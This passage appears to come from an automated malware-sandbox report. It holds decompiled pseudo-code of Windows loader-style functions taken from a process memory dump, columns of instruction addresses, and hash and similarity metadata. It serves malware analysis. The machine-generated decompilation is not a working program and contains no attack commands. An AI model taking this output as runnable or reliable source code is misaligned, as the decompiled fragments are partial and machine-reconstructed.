														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L033E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E033BFFB0(_t293, _t353, 0x34984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E033E37F5(_t353, 0);
																}
																E033E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E033D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E033D02D6(_t174);
																}
																L033C77F0( *0x3497b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E033DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L033BEC7F(_t353);
										L033D19B8(_t287, 0, _t353, 0);
										_t200 = E033AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x349b2f8 |  *0x349b2fc) == 0 || ( *0x349b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E033EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x349b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E03456B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E03456AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E033BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L033BEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E033E9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E033BE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L033B8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E033E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                          0x033bd5f2
                                          0x033bd5f5
                                          0x033bd5f5
                                          0x033bd5fd
                                          0x033bd600
                                          0x033bd60a
                                          0x033bd60d
                                          0x033bd617
                                          0x033bd61d
                                          0x033bd627
                                          0x033bd62e
                                          0x033bd911
                                          0x033bd913
                                          0x00000000
                                          0x033bd919
                                          0x033bd919
                                          0x033bd919
                                          0x033bd634
                                          0x033bd634
                                          0x033bd634
                                          0x033bd634
                                          0x033bd640
                                          0x033bd8bf
                                          0x00000000
                                          0x033bd646
                                          0x033bd646
                                          0x033bd64d
                                          0x033bd652
                                          0x0340b2fc
                                          0x0340b2fc
                                          0x0340b302
                                          0x0340b33b
                                          0x0340b341
                                          0x00000000
                                          0x0340b304
                                          0x0340b304
                                          0x0340b319
                                          0x0340b31e
                                          0x0340b324
                                          0x0340b326
                                          0x0340b332
                                          0x0340b347
                                          0x0340b34c
                                          0x0340b351
                                          0x0340b35a
                                          0x00000000
                                          0x0340b328
                                          0x0340b328
                                          0x00000000
                                          0x0340b328
                                          0x0340b326
                                          0x033bd658
                                          0x033bd658
                                          0x033bd65b
                                          0x033bd665
                                          0x00000000
                                          0x033bd66b
                                          0x033bd66b
                                          0x033bd66b
                                          0x033bd66b
                                          0x033bd66d
                                          0x033bd672
                                          0x033bd67a
                                          0x00000000
                                          0x00000000
                                          0x033bd680
                                          0x033bd686
                                          0x033bd8ce
                                          0x033bd8d4
                                          0x033bd8dd
                                          0x033bd8e0
                                          0x033bd68c
                                          0x033bd691
                                          0x033bd69d
                                          0x033bd6a2
                                          0x033bd6a7
                                          0x033bd6b0
                                          0x033bd6b5
                                          0x033bd6e0
                                          0x033bd6b7
                                          0x033bd6b7
                                          0x033bd6b9
                                          0x033bd6b9
                                          0x033bd6bb
                                          0x033bd6bd
                                          0x033bd6ce
                                          0x033bd6d0
                                          0x033bd6d2
                                          0x0340b363
                                          0x0340b365
                                          0x00000000
                                          0x0340b36b
                                          0x00000000
                                          0x0340b36b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bd6bf
                                          0x033bd6bf
                                          0x033bd6e5
                                          0x033bd6e7
                                          0x033bd6e9
                                          0x033bd6ec
                                          0x033bd6ec
                                          0x033bd6ef
                                          0x033bd6f5
                                          0x033bd6f9
                                          0x033bd6fb
                                          0x033bd6fd
                                          0x033bd701
                                          0x033bd703
                                          0x033bd70a
                                          0x033bd70a
                                          0x033bd701
                                          0x033bd710
                                          0x033bd710
                                          0x033bd6c1
                                          0x033bd6c1
                                          0x033bd6c6
                                          0x0340b36d
                                          0x0340b36f
                                          0x00000000
                                          0x0340b375
                                          0x0340b375
                                          0x0340b375
                                          0x00000000
                                          0x0340b375
                                          0x00000000
                                          0x033bd6cc
                                          0x033bd6d8
                                          0x033bd6d8
                                          0x033bd6d8
                                          0x00000000
                                          0x033bd6c6
                                          0x033bd6bf
                                          0x00000000
                                          0x033bd6da
                                          0x033bd6da
                                          0x033bd716
                                          0x033bd71b
                                          0x033bd720
                                          0x033bd726
                                          0x033bd726
                                          0x033bd72d
                                          0x00000000
                                          0x033bd733
                                          0x033bd739
                                          0x033bd742
                                          0x033bd750
                                          0x033bd758
                                          0x033bd764
                                          0x033bd776
                                          0x033bd77a
                                          0x033bd783
                                          0x033bd928
                                          0x033bd92c
                                          0x033bd93d
                                          0x033bd944
                                          0x033bd94f
                                          0x033bd954
                                          0x033bd956
                                          0x033bd95f
                                          0x033bd961
                                          0x033bd973
                                          0x033bd973
                                          0x033bd956
                                          0x033bd944
                                          0x033bd92c
                                          0x033bd78b
                                          0x0340b394
                                          0x033bd791
                                          0x033bd798
                                          0x0340b3a3
                                          0x0340b3bb
                                          0x0340b3bb
                                          0x033bd7a5
                                          0x033bd866
                                          0x033bd870
                                          0x033bd892
                                          0x033bd898
                                          0x033bd89e
                                          0x033bd8a0
                                          0x033bd8a6
                                          0x033bd8ac
                                          0x033bd8ae
                                          0x033bd8b4
                                          0x033bd8b4
                                          0x033bd8ae
                                          0x033bd7a5
                                          0x033bd78b
                                          0x033bd7b1
                                          0x0340b3c5
                                          0x0340b3c5
                                          0x033bd7c3
                                          0x033bd7ca
                                          0x033bd7e5
                                          0x033bd7eb
                                          0x033bd8eb
                                          0x033bd8ed
                                          0x00000000
                                          0x033bd8f3
                                          0x033bd8f3
                                          0x033bd8f3
                                          0x00000000
                                          0x033bd8ed
                                          0x033bd7cc
                                          0x033bd7cc
                                          0x033bd7d2
                                          0x00000000
                                          0x033bd7d4
                                          0x033bd7d4
                                          0x033bd7d7
                                          0x033bd7df
                                          0x0340b3d4
                                          0x0340b3d9
                                          0x0340b3dc
                                          0x0340b3dc
                                          0x0340b3df
                                          0x0340b3e2
                                          0x0340b468
                                          0x0340b46d
                                          0x0340b46f
                                          0x0340b46f
                                          0x0340b475
                                          0x033bd8f8
                                          0x033bd8f9
                                          0x033bd8fd
                                          0x0340b3e8
                                          0x0340b3e8
                                          0x0340b3eb
                                          0x0340b3ed
                                          0x00000000
                                          0x0340b3ef
                                          0x0340b3ef
                                          0x0340b3f1
                                          0x0340b3f4
                                          0x0340b3fe
                                          0x0340b404
                                          0x0340b409
                                          0x0340b40e
                                          0x0340b410
                                          0x0340b410
                                          0x0340b414
                                          0x0340b414
                                          0x0340b41b
                                          0x0340b420
                                          0x0340b423
                                          0x0340b425
                                          0x0340b427
                                          0x0340b42a
                                          0x0340b42d
                                          0x0340b42d
                                          0x0340b42a
                                          0x0340b432
                                          0x0340b436
                                          0x0340b438
                                          0x0340b43b
                                          0x0340b43b
                                          0x0340b449
                                          0x0340b44e
                                          0x0340b454
                                          0x0340b458
                                          0x0340b458
                                          0x0340b45d
                                          0x00000000
                                          0x0340b45d
                                          0x0340b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bd7df
                                          0x033bd7d2
                                          0x033bd7ca
                                          0x0340b37c
                                          0x0340b37e
                                          0x0340b385
                                          0x0340b38a
                                          0x00000000
                                          0x0340b38a
                                          0x033bd742
                                          0x033bd7f1
                                          0x033bd7f8
                                          0x0340b49b
                                          0x0340b49b
                                          0x033bd800
                                          0x033bd837
                                          0x033bd843
                                          0x033bd845
                                          0x033bd847
                                          0x033bd84a
                                          0x033bd84b
                                          0x033bd84e
                                          0x033bd857
                                          0x033bd818
                                          0x033bd824
                                          0x033bd831
                                          0x0340b4a5
                                          0x0340b4ab
                                          0x0340b4b3
                                          0x0340b4b8
                                          0x0340b4bb
                                          0x00000000
                                          0x0340b4c1
                                          0x0340b4c1
                                          0x0340b4c8
                                          0x00000000
                                          0x0340b4ce
                                          0x0340b4d4
                                          0x0340b4e1
                                          0x0340b4e3
                                          0x0340b4e5
                                          0x00000000
                                          0x0340b4eb
                                          0x0340b4f0
                                          0x0340b4f2
                                          0x033bdac9
                                          0x033bdacc
                                          0x033bdacf
                                          0x033bdad1
                                          0x033bdd78
                                          0x033bdd78
                                          0x033bdcf2
                                          0x00000000
                                          0x033bdad7
                                          0x033bdad9
                                          0x033bdadb
                                          0x00000000
                                          0x00000000
                                          0x033bdae1
                                          0x033bdae1
                                          0x033bdae4
                                          0x033bdae6
                                          0x0340b4f9
                                          0x0340b4f9
                                          0x0340b500
                                          0x033bdaec
                                          0x033bdaec
                                          0x033bdaf5
                                          0x033bdaf8
                                          0x033bdafb
                                          0x033bdb03
                                          0x033bdb11
                                          0x033bdb16
                                          0x033bdb19
                                          0x033bdb1b
                                          0x0340b52c
                                          0x0340b531
                                          0x0340b534
                                          0x033bdb21
                                          0x033bdb21
                                          0x033bdb24
                                          0x033bdcd9
                                          0x033bdce2
                                          0x033bdce5
                                          0x033bdd6a
                                          0x033bdd6d
                                          0x00000000
                                          0x033bdd73
                                          0x0340b51a
                                          0x0340b51c
                                          0x0340b51f
                                          0x0340b524
                                          0x00000000
                                          0x0340b524
                                          0x033bdce7
                                          0x033bdce7
                                          0x033bdce7
                                          0x00000000
                                          0x033bdce7
                                          0x00000000
                                          0x033bdb2a
                                          0x033bdb2c
                                          0x033bdb31
                                          0x033bdb33
                                          0x033bdb36
                                          0x033bdb39
                                          0x033bdb3b
                                          0x033bdb66
                                          0x033bdb66
                                          0x033bdb3d
                                          0x033bdb3d
                                          0x033bdb3e
                                          0x033bdb46
                                          0x033bdb47
                                          0x033bdb49
                                          0x033bdb4c
                                          0x033bdb53
                                          0x033bdb55
                                          0x033bdb58
                                          0x033bdb5a
                                          0x0340b50a
                                          0x0340b50f
                                          0x0340b512
                                          0x033bdb60
                                          0x033bdb60
                                          0x033bdb63
                                          0x033bdb63
                                          0x00000000
                                          0x033bdb63
                                          0x033bdb5a
                                          0x033bdb3b
                                          0x033bdb24
                                          0x033bdb69
                                          0x033bdb69
                                          0x033bdb6c
                                          0x033bdb6f
                                          0x033bdb74
                                          0x0340b557
                                          0x0340b557
                                          0x0340b55e
                                          0x033bdb7a
                                          0x033bdb7c
                                          0x033bdb7f
                                          0x033bdb82
                                          0x033bdb85
                                          0x00000000
                                          0x033bdb8b
                                          0x033bdb8b
                                          0x033bdb8d
                                          0x033bdb9b
                                          0x033bdb9b
                                          0x033bdb9d
                                          0x033bdba0
                                          0x033bdba2
                                          0x033bdba4
                                          0x033bdba7
                                          0x033bdba9
                                          0x033bdbae
                                          0x033bdbae
                                          0x033bdbb1
                                          0x033bdbb4
                                          0x033bdbb4
                                          0x033bdbb7
                                          0x033bdbba
                                          0x033bdcd2
                                          0x033bdcd4
                                          0x00000000
                                          0x033bdbc0
                                          0x033bdbc0
                                          0x033bdbd2
                                          0x033bdbd7
                                          0x033bdbda
                                          0x033bdbdd
                                          0x033bdbdf
                                          0x00000000
                                          0x033bdbe5
                                          0x033bdbe5
                                          0x033bdbee
                                          0x033bdbf1
                                          0x0340b541
                                          0x0340b544
                                          0x00000000
                                          0x0340b546
                                          0x0340b546
                                          0x00000000
                                          0x0340b546
                                          0x033bdbf7
                                          0x033bdbf7
                                          0x033bdbfd
                                          0x033bdbfd
                                          0x033bdbff
                                          0x033bdc0b
                                          0x033bdc15
                                          0x033bdc1b
                                          0x033bdc1d
                                          0x033bdc21
                                          0x033bdc21
                                          0x033bdc23
                                          0x033bdc23
                                          0x033bdc26
                                          0x033bdc29
                                          0x033bdc2b
                                          0x00000000
                                          0x00000000
                                          0x033bdc31
                                          0x033bdc34
                                          0x033bdc36
                                          0x033bdcbf
                                          0x033bdcbf
                                          0x033bdcc2
                                          0x00000000
                                          0x033bdc3c
                                          0x033bdc41
                                          0x033bdc43
                                          0x00000000
                                          0x033bdc45
                                          0x033bdc45
                                          0x033bdc47
                                          0x00000000
                                          0x033bdc4d
                                          0x033bdc4d
                                          0x033bdc50
                                          0x033bdc52
                                          0x033bdc55
                                          0x033bdcfa
                                          0x033bdcfe
                                          0x033bdd08
                                          0x033bdd0a
                                          0x033bdd0c
                                          0x00000000
                                          0x033bdd12
                                          0x033bdd15
                                          0x033bdd2d
                                          0x033bdd2f
                                          0x033bdd32
                                          0x033bdd35
                                          0x00000000
                                          0x033bdd35
                                          0x033bdc5b
                                          0x033bdc5b
                                          0x033bdc5e
                                          0x033bdc61
                                          0x033bdc64
                                          0x033bdc67
                                          0x033bdc67
                                          0x033bdc6a
                                          0x033bdc6c
                                          0x033bdc8e
                                          0x033bdc8e
                                          0x033bdc91
                                          0x033bdc93
                                          0x033bdcce
                                          0x033bdcce
                                          0x033bdc95
                                          0x033bdc9c
                                          0x033bdc6e
                                          0x033bdc72
                                          0x033bdc75
                                          0x033bdc77
                                          0x033bdc79
                                          0x0340b551
                                          0x0340b551
                                          0x00000000
                                          0x033bdc7f
                                          0x033bdc7f
                                          0x033bdc81
                                          0x00000000
                                          0x033bdc83
                                          0x033bdc86
                                          0x033bdc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bdc88
                                          0x033bdc81
                                          0x033bdc79
                                          0x033bdc6c
                                          0x033bdc55
                                          0x033bdc47
                                          0x033bdc43
                                          0x00000000
                                          0x033bdc36
                                          0x033bdc23
                                          0x00000000
                                          0x033bdbff
                                          0x033bdbf1
                                          0x033bdbdf
                                          0x033bdb8f
                                          0x033bdb92
                                          0x033bdb95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bdb95
                                          0x033bdb8d
                                          0x033bdb85
                                          0x033bdb74
                                          0x033bdc9f
                                          0x033bdca2
                                          0x033bdcb0
                                          0x033bdcb0
                                          0x033bdad1
                                          0x0340b4e5
                                          0x0340b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bd831
                                          0x00000000
                                          0x033bd800
                                          0x0340b47f
                                          0x0340b485
                                          0x00000000
                                          0x0340b485
                                          0x033bd665
                                          0x033bd652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4e900c09249ad3af094c4ed604cac288501e0c9dbf8419a3a7bf8fd1309fc9c
                                          • Instruction ID: a3965e31abe57ec2ed7ae8d7a5e2ae74ccb81dc683cd05876a087ee439f5485b
                                          • Opcode Fuzzy Hash: d4e900c09249ad3af094c4ed604cac288501e0c9dbf8419a3a7bf8fd1309fc9c
                                          • Instruction Fuzzy Hash: E1E1C234B003598FDB24DF28C8C4BEAB7B5FF45314F1801AAEA09AFA91D7749941CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B849B, Relevance: .3, Instructions: 290COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E033B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x347f9c0);
				E033FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3497b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E033BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E033C2280( *[fs:0x30], 0x3498550);
						_t139 =  *0x3497b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E033DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E033BFFB0(_t193, _t235, 0x3498550);
								L5:
								return E033FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E033A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3497b9c; // 0x0
							_t235 = L033C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3497b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E033DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E033BFFB0(_t193, _t235, 0x3498550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L033C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L033C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3497b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3497b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E033E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3497b9c; // 0x0
									_t214 = L033C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E033E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3497b10 =  *0x3497b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3497b04 =  *0x3497b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L033C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L033C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3497b08 =  *0x3497b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E033E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
